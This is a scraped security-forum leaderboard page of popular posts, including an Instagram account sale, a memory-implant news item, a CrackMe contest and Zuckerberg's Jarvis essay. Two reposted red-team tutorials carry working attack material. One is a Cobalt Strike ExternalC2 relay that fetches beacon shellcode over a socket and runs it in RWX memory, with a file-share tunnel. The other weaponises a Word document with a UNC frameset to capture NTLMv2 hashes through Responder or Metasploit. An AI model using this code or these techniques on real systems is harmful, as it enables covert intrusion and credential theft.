Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 05/09/18 in all areas

  1. Vand cont Instagram care are 11k acum la momentul postarii. Detalii: Nisa: Comedie,imagini amuzante Followers: 11 K Engagement: 500-2000 likes + comments / per picture. Payment Accepted: Paypal Pretul pe cont este 8$ per 1000 urmaritori. In momentul de fata dau contul cu 80$. Cine doreste poate sa-mi trimita pm.
    1 point
  2. A study funded by DARPA increased the possibility of memory-enhancing brain prosthetics. The animal research done previously showed successful results after which the study was conducted on patients at Wake Forest Baptist Medical Center. The patients there were already having brain implants as a part of their epilepsy treatment. They experienced major improvements in both short-term and long-term memory. The patients were asked to play a memory-related computer game in which they were asked to remember specific things. When the patients were trying to remember those things, the researchers recorded various patterns of neural firing in the brain’s hippocampus area. The hippocampus area of the brain is responsible for the memory. They also paid attention to neural patterns that resulted in the correct memory being encoded. After that, they made the patients play the game again and electrically simulated each patient’s brain by using the encoding patterns studied earlier. They were hoping to use those electrical simulators to trigger more effective memory storage of the data which they have. The method worked successfully and showed results that were better than what the team was expecting. The results on the short-term memory tests jumped by a huge 37% and the long-term memory tests enhanced by 35%. Robert Hampson, the lead author of the study said, “We showed that we could tap into a patient’s own memory content, reinforce it and feed it back to the patient. Even when a person’s memory is impaired, it is possible to identify the neural firing patterns that indicate correct memory formation and separate them from the patterns that are incorrect. We can then feed in the correct patterns to assist the patient’s brain in accurately forming new memories, not as a replacement for innate memory function, but as a boost to it.” The research has opened the door to the memory-enhancing brain implants. These implants might give a button which can be pressed when looking at something to increase the chances of remembering it later. The researchers are looking at this as a potential medical device to help the patients with Alzheimers, stroke or traumatic brain injury patients. The implant will help them re-start the process of forming new memories using their brain’s own activity patterns. The team is also hoping that the technology might be able to assist people in keeping memories which they have encoded already. Hampson says, “In the future, we hope to be able to help people hold onto specific memories, such as where they live or what their grandkids look like when their overall memory begins to fail.” Sursa: http://wonderfulengineering.com/brain-prosthetic-boost-memory-shown-impressive-results-human-trials/
    1 point
  3. 1 point
  4. Tre' sa-ti pui intrebarea aia "Am 18 milioane, n-ar fi cazul sa ma opresc?"
    1 point
  5. S`a dus viata lor O sa le dea aia 300 ani de parnaie ...
    1 point
  6. E valid (self) pentru cei care nu au incredere.
    1 point
  7. Is curios cum scoateti voi din popads, stiu ca te arde la SEO pt astea.
    1 point
  8. Da, parametrul vulnerabil e alert('xss') in consola De ce ai dat in jos sa nu se vada form-ul de search? penibil... Frumos la bookmark's "CC generator", esti bun @aramen @Nytro In caz ca sterge poza : http://prntscr.com/je217y Out cu carder-ul asta. @Zekor si eu am redtube la bookmarks de mult, n am nici o treaba cu ei, jur...
    1 point
  9. As before, the CrackMe is dedicated to malware analysts and to those who want to practice becoming them. That’s why it is not just a set of some abstract riddles, but an exercise that walks through selected tricks that were used in real malware. (Expect some original schemes designed just for this game, too.) Of course, all is demonstrated on harmless examples, but we still recommend you use VM for reversing it so that it will not interfere with any antivirus protection. Rules of the contest There are two CrackMe contests: Capture the flag. The first three submitted flags win. The flag should be submitted along with (minimalistic) notes about the steps taken to find it. (No detailed write-up is required.) Best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show his/her method of solving the CrackMe, as well as their level of understanding of the techniques used. The write-up submission contest closes three weeks after capture the flag. Submissions to both contests should be sent to my Twitter account: @hasherezade. Each of the four winners will get a prize: a book of his/her choice and some Malwarebytes swag. At the end of the contest, I will publish my own solution, made from the point of view of author. All the submitted write-ups will be linked. Asking questions I want the contest to be fair to everyone, so I will not be answering any questions in private. However, if you are stuck, please don’t hesitate to post your question in the comments section of this post, and I will answer as soon as possible. The questions can be also answered by other participants. Giving false clues or teasing beginners will result in a ban—please respect fair play. The application The application is a Windows executable. It was tested on Windows 7 and above. You can download it here. Have fun! Sursa: https://blog.malwarebytes.com/security-world/2018/04/malwarebytes-crackme-2-another-challenge/
    1 point
  10. Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
    1 point
  11. My personal challenge for 2016 was to build a simple AI to run my home -- like Jarvis in Iron Man. My goal was to learn about the state of artificial intelligence -- where we're further along than people realize and where we're still a long ways off. These challenges always lead me to learn more than I expected, and this one also gave me a better sense of all the internal technology Facebook engineers get to use, as well as a thorough overview of home automation. So far this year, I've built a simple AI that I can talk to on my phone and computer, that can control my home, including lights, temperature, appliances, music and security, that learns my tastes and patterns, that can learn new words and concepts, and that can even entertain Max. It uses several artificial intelligence techniques, including natural language processing, speech recognition, face recognition, and reinforcement learning, written in Python, PHP and Objective C. In this note, I'll explain what I built and what I learned along the way. Diagram of the systems connected to build Jarvis. Getting Started: Connecting the Home In some ways, this challenge was easier than I expected. In fact, my running challenge (I also set out to run 365 miles in 2016) took more total time. But one aspect that was much more complicated than I expected was simply connecting and communicating with all of the different systems in my home. Before I could build any AI, I first needed to write code to connect these systems, which all speak different languages and protocols. We use a Crestron system with our lights, thermostat and doors, a Sonos system with Spotify for music, a Samsung TV, a Nest cam for Max, and of course my work is connected to Facebook's systems. I had to reverse engineer APIs for some of these to even get to the point where I could issue a command from my computer to turn the lights on or get a song to play. Further, most appliances aren't even connected to the internet yet. It's possible to control some of these using internet-connected power switches that let you turn the power on and off remotely. But often that isn't enough. For example, one thing I learned is it's hard to find a toaster that will let you push the bread down while it's powered off so you can automatically start toasting when the power goes on. I ended up finding an old toaster from the 1950s and rigging it up with a connected switch. Similarly, I found that connecting a food dispenser for Beast or a grey t-shirt cannon would require hardware modifications to work. For assistants like Jarvis to be able to control everything in homes for more people, we need more devices to be connected and the industry needs to develop common APIs and standards for the devices to talk to each other. An example natural language request from command line. Natural Language Once I wrote the code so my computer could control my home, the next step was making it so I could talk to my computer and home the way I'd talk to anyone else. This was a two step process: first I made it so I could communicate using text messages, and later I added the ability to speak and have it translate my speech into text for it to read. It started simple by looking for keywords, like "bedroom", "lights", and "on" to determine I was telling it to turn the lights on in the bedroom. It quickly became clear that it needed to learn synonyms, like that "family room" and "living room" mean the same thing in our home. This meant building a way to teach it new words and concepts. Understanding context is important for any AI. For example, when I tell it to turn the AC up in "my office", that means something completely different from when Priscilla tells it the exact same thing. That one caused some issues! Or, for example, when you ask it to make the lights dimmer or to play a song without specifying a room, it needs to know where you are or it might end up blasting music in Max's room when we really need her to take a nap. Whoops. Music is a more interesting and complex domain for natural language because there are too many artists, songs and albums for a keyword system to handle. The range of things you can ask it is also much greater. Lights can only be turned up or down, but when you say "play X", even subtle variations can mean many different things. Consider these requests related to Adele: "play someone like you", "play someone like adele", and "play some adele". Those sound similar, but each is a completely different category of request. The first plays a specific song, the second recommends an artist, and the third creates a playlist of Adele's best songs. Through a system of positive and negative feedback, an AI can learn these differences. The more context an AI has, the better it can handle open-ended requests. At this point, I mostly just ask Jarvis to "play me some music" and by looking at my past listening patterns, it mostly nails something I'd want to hear. If it gets the mood wrong, I can just tell it, for example, "that's not light, play something light", and it can both learn the classification for that song and adjust immediately. It also knows whether I'm talking to it or Priscilla is, so it can make recommendations based on what we each listen to. In general, I've found we use these more open-ended requests more frequently than more specific asks. No commercial products I know of do this today, and this seems like a big opportunity. Jarvis uses face recognition to let my friends in automatically and let me know. Vision and Face Recognition About one-third of the human brain is dedicated to vision, and there are many important AI problems related to understanding what is happening in images and videos. These problems include tracking (eg is Max awake and moving around in her crib?), object recognition (eg is that Beast or a rug in that room?), and face recognition (eg who is at the door?). Face recognition is a particularly difficult version of object recognition because most people look relatively similar compared to telling apart two random objects -- for example, a sandwich and a house. But Facebook has gotten very good at face recognition for identifying when your friends are in your photos. That expertise is also useful when your friends are at your door and your AI needs to determine whether to let them in. To do this, I installed a few cameras at my door that can capture images from all angles. AI systems today cannot identify people from the back of their heads, so having a few angles ensures we see the person's face. I built a simple server that continuously watches the cameras and runs a two step process: first, it runs face detection to see if any person has come into view, and second, if it finds a face, then it runs face recognition to identify who the person is. Once it identifies the person, it checks a list to confirm I'm expecting that person, and if I am then it will let them in and tell me they're here. This type of visual AI system is useful for a number of things, including knowing when Max is awake so it can start playing music or a Mandarin lesson, or solving the context problem of knowing which room in the house we're in so the AI can correctly respond to context-free requests like "turn the lights on" without providing a location. Like most aspects of this AI, vision is most useful when it informs a broader model of the world, connected with other abilities like knowing who your friends are and how to open the door when they're here. The more context the system has, the smarter is gets overall. I can text Jarvis from anywhere using a Messenger bot. Messenger Bot I programmed Jarvis on my computer, but in order to be useful I wanted to be able to communicate with it from anywhere I happened to be. That meant the communication had to happen through my phone, not a device placed in my home. I started off building a Messenger bot to communicate with Jarvis because it was so much easier than building a separate app. Messenger has a simple framework for building bots, and it automatically handles many things for you -- working across both iOS and Android, supporting text, image and audio content, reliably delivering push notifications, managing identity and permissions for different people, and more. You can learn about the bot framework at messenger.com/platform. I can text anything to my Jarvis bot, and it will instantly be relayed to my Jarvis server and processed. I can also send audio clips and the server can translate them into text and then execute those commands. In the middle of the day, if someone arrives at my home, Jarvis can text me an image and tell me who's there, or it can text me when I need to go do something. One thing that surprised me about my communication with Jarvis is that when I have the choice of either speaking or texting, I text much more than I would have expected. This is for a number of reasons, but mostly it feels less disturbing to people around me. If I'm doing something that relates to them, like playing music for all of us, then speaking feels fine, but most of the time text feels more appropriate. Similarly, when Jarvis communicates with me, I'd much rather receive that over text message than voice. That's because voice can be disruptive and text gives you more control of when you want to look at it. Even when I speak to Jarvis, if I'm using my phone, I often prefer it to text or display its response. This preference for text communication over voice communication fits a pattern we're seeing with Messenger and WhatsApp overall, where the volume of text messaging around the world is growing much faster than the volume of voice communication. This suggests that future AI products cannot be solely focused on voice and will need a private messaging interface as well. Once you're enabling private messaging, it's much better to use a platform like Messenger than to build a new app from scratch. I have always been optimistic about AI bots, but my experience with Jarvis has made me even more optimistic that we'll all communicate with bots like Jarvis in the future. Jarvis uses speech recognition in my iOS app to listen to my request for a fresh t-shirt. Voice and Speech Recognition Even though I think text will be more important for communicating with AIs than people realize, I still think voice will play a very important role too. The most useful aspect of voice is that it's very fast. You don't need to take out your phone, open an app, and start typing -- you just speak. To enable voice for Jarvis, I needed to build a dedicated Jarvis app that could listen continuously to what I say. The Messenger bot is great for many things, but the friction for using speech is way too much. My dedicated Jarvis app lets me put my phone on a desk and just have it listen. I could also put a number of phones with the Jarvis app around my home so I could talk to Jarvis in any room. That seems similar to Amazon's vision with Echo, but in my experience, it's surprising how frequently I want to communicate with Jarvis when I'm not home, so having the phone be the primary interface rather than a home device seems critical. I built the first version of the Jarvis app for iOS and I plan to build an Android version soon too. I hadn't built an iOS app since 2012 and one of my main observations is that the toolchain we've built at Facebook since then for developing these apps and for doing speech recognition is very impressive. Speech recognition systems have improved recently, but no AI system is good enough to understand conversational speech just yet. Speech recognition relies on both listening to what you say and predicting what you will say next, so structured speech is still much easier to understand than unstructured conversation. Another interesting limitation of speech recognition systems -- and machine learning systems more generally -- is that they are more optimized for specific problems than most people realize. For example, understanding a person talking to a computer is subtly different problem from understanding a person talking to another person. If you train a machine learning system on data from Google of people speaking to a search engine, it will perform relatively worse on Facebook at understanding people talking to real people. In the case of Jarvis, training an AI that you'll talk to at close range is also different from training a system you'll talk to from all the way across the room, like Echo. These systems are more specialized than it appears, and that implies we are further off from having general systems than it might seem. On a psychologic level, once you can speak to a system, you attribute more emotional depth to it than a computer you might interact with using text or a graphic interface. One interesting observation is that ever since I built voice into Jarvis, I've also wanted to build in more humor. Part of this is that now it can interact with Max and I want those interactions to be entertaining for her, but part of it is that it now feels like it's present with us. I've taught it fun little games like Priscilla or I can ask it who we should tickle and it will randomly tell our family to all go tickle one of us, Max or Beast. I've also had fun adding classic lines like "I'm sorry, Priscilla. I'm afraid I can't do that." There's a lot more to explore with voice. The AI technology is just getting good enough for this to be the basis of a great product, and it will get much better in the next few years. At the same time, I think the best products like this will be ones you can bring with you anywhere and communicate with privately as well. Facebook Engineering Environment As the CEO of Facebook, I don't get much time to write code in our internal environment. I've never stopped coding, but these days I mostly build personal projects like Jarvis. I expected I'd learn a lot about the state of AI this year, but I didn't realize I would also learn so much about what it's like to be an engineer at Facebook. And it's impressive. My experience of ramping up in the Facebook codebase is probably pretty similar to what most new engineers here go through. I was consistently impressed by how well organized our code is, and how easy it was to find what you're looking for -- whether it's related to face recognition, speech recognition, the Messenger Bot Framework [messenger.com/platform] or iOS development. The open source Nuclide [github.com/facebook/nuclide] packages we've built to work with GitHub's Atom make development much easier. The Buck [buckbuild.com] build system we've developed to build large projects quickly also saved me a lot of time. Our open source FastText [github.com/facebookresearch/fastText] AI text classification tool is also a good one to check out, and if you're interested in AI development, the whole Facebook Research [github.com/facebookresearch] GitHub repo is worth taking a look at. One of our values is "move fast". That means you should be able to come here and build an app faster than you can anywhere else, including on your own. You should be able to come here and use our infra and AI tools to build things it would take you a long time to build on your own. Building internal tools that make engineering more efficient is important to any technology company, but this is something we take especially seriously. So I want to give a shout out to everyone on our infra and tools teams that make this so good. Next Steps Although this challenge is ending, I'm sure I'll continue improving Jarvis since I use it every day and I'm always finding new things I want to add. In the near term, the clearest next steps are building an Android app, setting up Jarvis voice terminals in more rooms around my home, and connecting more appliances. I'd love to have Jarvis control my Big Green Egg and help me cook, but that will take even more serious hacking than rigging up the t-shirt cannon. In the longer term, I'd like to explore teaching Jarvis how to learn new skills itself rather than me having to teach it how to perform specific tasks. If I spent another year on this challenge, I'd focus more on learning how learning works. Finally, over time it would be interesting to find ways to make this available to the world. I considered open sourcing my code, but it's currently too tightly tied to my own home, appliances and network configuration. If I ever build a layer that abstracts more home automation functionality, I may release that. Or, of course, that could be a great foundation to build a new product. Conclusions Building Jarvis was an interesting intellectual challenge, and it gave me direct experience building AI tools in areas that are important for our future. I've previously predicted that within 5-10 years we'll have AI systems that are more accurate than people for each of our senses -- vision, hearing, touch, etc, as well as things like language. It's impressive how powerful the state of the art for these tools is becoming, and this year makes me more confident in my prediction. At the same time, we are still far off from understanding how learning works. Everything I did this year -- natural language, face recognition, speech recognition and so on -- are all variants of the same fundamental pattern recognition techniques. We know how to show a computer many examples of something so it can recognize it accurately, but we still do not know how to take an idea from one domain and apply it to something completely different. To put that in perspective, I spent about 100 hours building Jarvis this year, and now I have a pretty good system that understands me and can do lots of things. But even if I spent 1,000 more hours, I probably wouldn't be able to build a system that could learn completely new skills on its own -- unless I made some fundamental breakthrough in the state of AI along the way. In a way, AI is both closer and farther off than we imagine. AI is closer to being able to do more powerful things than most people expect -- driving cars, curing diseases, discovering planets, understanding media. Those will each have a great impact on the world, but we're still figuring out what real intelligence is. Overall, this was a great challenge. These challenges have a way of teaching me more than I expected at the beginning. This year I thought I'd learn about AI, and I also learned about home automation and Facebook's internal technology too. That's what's so interesting about these challenges. Thanks for following along with this challenge and I'm looking forward to sharing next year's challenge in a few weeks. Sursa: https://www.facebook.com/notes/mark-zuckerberg/building-jarvis/10154361492931634/
    1 point
  12. Exploring Cobalt Strike's ExternalC2 framework Posted on 30th March 2018 As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike’s ExternalC2 framework. ExternalC2 ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components: Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel. Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon. SMB Beacon - The standard beacon which will be executed on the victim host. Using the diagram from CS's documentation, we can see just how this all fits together: Here we can see that our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control. Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. The protocol is actually pretty straight forward, consisting of a 4 byte little-endian length field, and a blob of data, for example: To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options: arch - The architecture of the beacon to be used (x86 or x64). pipename - The name of the pipe used to communicate with the beacon. block - Time in milliseconds that TeamServer will block between tasks. Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon. Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data. OK, enough theory, let’s create a “Hello World” example to simply relay the communication over a network. Hello World ExternalC2 Example For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2: # start the External C2 server and bind to 0.0.0.0:2222 externalc2_start("0.0.0.0", 2222); This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller. Let’s first establish our connection to the TeamServer ExternalC2 interface: _socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketTS.connect(("127.0.0.1", 2222)) Once established, we need to send over our options. We will create a few quick helper function to allow us to prefix our 4 byte length without manually crafting it each time: def encodeFrame(data): return struct.pack("<I", len(data)) + data def sendToTS(data): _socketTS.sendall(encodeFrame(data)) Now we can use these helper functions to send over our options: # Send out config options sendToTS("arch=x86") sendToTS(“pipename=xpntest") sendToTS("block=500") sendToTS("go") Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again let’s create a few helper functions to handle the decoding of packets rather than manually decoding each time: def decodeFrame(data): len = struct.unpack("<I", data[0:3]) body = data[4:] return (len, body) def recvFromTS(): data = "" _len = _socketTS.recv(4) l = struct.unpack("<I",_len)[0] while len(data) < l: data += _socketTS.recv(l - len(data)) return data This allows us to receive raw data with: data = recvFromTS() Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to: _socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketBeacon.bind(("0.0.0.0", 8081)) _socketBeacon.listen(1) _socketClient = _socketBeacon.accept()[0] Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host: while(True): print "Sending %d bytes to beacon" % len(data) sendToBeacon(data) data = recvFromBeacon() print "Received %d bytes from beacon" % len(data) print "Sending %d bytes to TS" % len(data) sendToTS(data) data = recvFromTS() print "Received %d bytes from TS" % len(data) Our finished example can be found here. Now we have a working controller, we need to create our Third-Party Client. To make things a bit easier, we will use win32 and C for this, giving us access to Windows native API. Let’s start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller: // Creates a new C2 controller connection for relaying commands SOCKET createC2Socket(const char *addr, WORD port) { WSADATA wsd; SOCKET sd; SOCKADDR_IN sin; WSAStartup(0x0202, &wsd); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.S_un.S_addr = inet_addr(addr); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); connect(sd, (SOCKADDR*)&sin, sizeof(sin)); return sd; } Next, we need a way to receive data. This is similar to what we saw in our Python code, with our length prefix being used as an indicator as to how many data bytes we are receiving: // Receives data from our C2 controller to be relayed to the injected beacon char *recvData(SOCKET sd, DWORD *len) { char *buffer; DWORD bytesReceived = 0, totalLen = 0; *len = 0; recv(sd, (char *)len, 4, 0); buffer = (char *)malloc(*len); if (buffer == NULL) return NULL; while (totalLen < *len) { bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0); totalLen += bytesReceived; } return buffer; } Similar, we need a way to return data over our C2 channel to the Controller: // Sends data to our C2 controller received from our injected beacon void sendData(SOCKET sd, const char *data, DWORD len) { char *buffer = (char *)malloc(len + 4); if (buffer == NULL): return; DWORD bytesWritten = 0, totalLen = 0; *(DWORD *)buffer = len; memcpy(buffer + 4, data, len); while (totalLen < len + 4) { bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0); totalLen += bytesWritten; } free(buffer); } Now we have the ability to communicate with our Controller, the first thing we want to do is to receive the beacon payload. This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and is expected to be copied into memory before being executed. For example, let’s grab the beacon payload: // Create a connection back to our C2 controller SOCKET c2socket = createC2Socket("192.168.1.65", 8081); payloadData = recvData(c2socket, &payloadLen); And then for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code: HANDLE threadHandle; DWORD threadId = 0; char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (alloc == NULL) return; memcpy(alloc, payload, len); threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId); Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands): // Loop until the pipe is up and ready to use while (beaconPipe == INVALID_HANDLE_VALUE) { // Create our IPC pipe for talking to the C2 beacon Sleep(500); beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest"); } And then, once we have a connection, we can continue with our send/recv loop: while (true) { // Start the pipe dance payloadData = recvFromBeacon(beaconPipe, &payloadLen); if (payloadLen == 0) break; sendData(c2socket, payloadData, payloadLen); free(payloadData); payloadData = recvData(c2socket, &payloadLen); if (payloadLen == 0) break; sendToBeacon(beaconPipe, payloadData, payloadLen); free(payloadData); } And that’s it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here. Now, onto something a bit more interesting. Transfer C2 over file Let’s recap on what it is we control when attempting to create a custom C2 protocol: From here, we can see that the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let’s attempt to port this into something a bit more interesting, transferring data over a file read/write. Why would we want to do this? Well, let’s say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted however is access to a file share... see where I’m going with this By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall’d machine, we have a way to run our Cobalt Strike beacon. Let’s think about just how this will look: Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third Party Controller. Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller. What we will do however, is split our previous Third-Party Client into 2 parts. One which is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second, which runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon. I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITEoptions are provided. This will allow both sides of the Third-Party Client to read and write to the file simultaneously: HANDLE openC2FileServer(const char *filepath) { HANDLE handle; handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (handle == INVALID_HANDLE_VALUE) printf("Error opening file: %x\n", GetLastError()); return handle; } Next, we need a way to serialising our C2 data into the file, as well as indicating which of the 2 clients should be processing data at any time. To do this, a simple header can be used, for example: struct file_c2_header { DWORD id; DWORD len; }; The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who writing data. Putting together our file read and write helpers, we have something that looks like this: void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) { char *fileBytes = NULL; DWORD bytesWritten = 0; fileBytes = (char *)malloc(8 + len); if (fileBytes == NULL) return; // Add our file header *(DWORD *)fileBytes = id; *(DWORD *)(fileBytes+4) = len; memcpy(fileBytes + 8, data, len); // Make sure we are at the beginning of the file SetFilePointer(c2File, 0, 0, FILE_BEGIN); // Write our C2 data in WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL); printf("[*] Wrote %d bytes\n", bytesWritten); } char *readC2File(HANDLE c2File, DWORD *len, int expect) { char header[8]; DWORD bytesRead = 0; char *fileBytes = NULL; memset(header, 0xFF, sizeof(header)); // Poll until we have our expected id in the header while (*(DWORD *)header != expect) { SetFilePointer(c2File, 0, 0, FILE_BEGIN); ReadFile(c2File, header, 8, &bytesRead, NULL); Sleep(100); } // Read out the expected length from the header *len = *(DWORD *)(header + 4); fileBytes = (char *)malloc(*len); if (fileBytes == NULL) return NULL; // Finally, read out our C2 data ReadFile(c2File, fileBytes, *len, &bytesRead, NULL); printf("[*] Read %d bytes\n", bytesRead); return fileBytes; } Here we see that we are adding our header to the file, and read/writing C2 data into the file respectively. And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here. Let's see this in action: If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2. Sursa: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
    1 point
  13. Microsoft Office – NTLM Hashes via Frameset December 18, 2017 Microsoft office documents are playing a vital role towards red team assessments as usually they are used to gain some initial foothold on the client’s internal network. Staying under the radar is a key element as well and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft office. Historically Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combing this with responder in order to capture NTLM hashes externally. Word documents with the docx extension are actually a zip file which contains various XML documents. These XML files are controlling the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files: Docx Contents The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the frameset. webSettings File Adding the following code will create a link with another file. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 <w:frameset> <w:framesetSplitbar> <w:w w:val="60"/> <w:color w:val="auto"/> <w:noBorder/> </w:framesetSplitbar> <w:frameset> <w:frame> <w:name w:val="3"/> <w:sourceFileName r:id="rId1"/> <w:linkedToFile/> </w:frame> </w:frameset> </w:frameset> webSettings XML – Frameset The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten. webSettings with Frameset – Adding new version to archive A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1) the UNC path and the TargetMode if it is external or internal. 1 2 3 4 5 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/> </Relationships> webSettings XML Relationship File – Contents The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset. webSettings XML rels Now that the Word document has been weaponized to connect to a UNC path over the Internet responder can be configured in order to capture the NTLM hashes. 1 responder -I wlan0 -e 192.168.1.169 -b -A -v Responder Configuration Once the target user open the word document it will try to connect to a UNC path. Word – Connect to UNC Path via Frameset Responder will retrieve the NTLMv2 hash of the user. Responder – NTLMv2 Hash via Frameset Alternatively Metasploit Framework can be used instead of Responder in order to capture the password hash. 1 auxiliary/server/capture/smb Metasploit – SMB Capture Module NTLMv2 hashes will be captured in Metasploit upon opening the document. Metasploit SMB Capture Module – NTLMv2 Hash via Frameset Conclusion This technique can allow the red team to grab domain password hashes from users which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally if the target user is an elevated account such as local administrator or domain admin then this method can be combined with SMB relay in order to obtain a Meterpreter session. Sursa: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
    1 point
  14. Pentester Academy TV Publicat pe 28 mar. 2018 ABONEAZĂ-TE 21 K Today's episode of The Tool Box features NetRipper. We breakdown everything you need to know! Including what it does, who it was developed by, and the best ways to use it! Check out NetRipper here: Github - https://github.com/NytroRST/NetRipper Send your tool to: media@pentesteracademy.com for consideration Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news! Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/ FOLLOW US ON: ~Facebook: http://bit.ly/2uS4pK0 ~Twitter: http://bit.ly/2vd5QSE ~Instagram: http://bit.ly/2v0tnY8 ~LinkedIn: http://bit.ly/2ujkyeC ~Google +: http://bit.ly/2tNFXtc ~Web: http://bit.ly/29dtbcn
    1 point
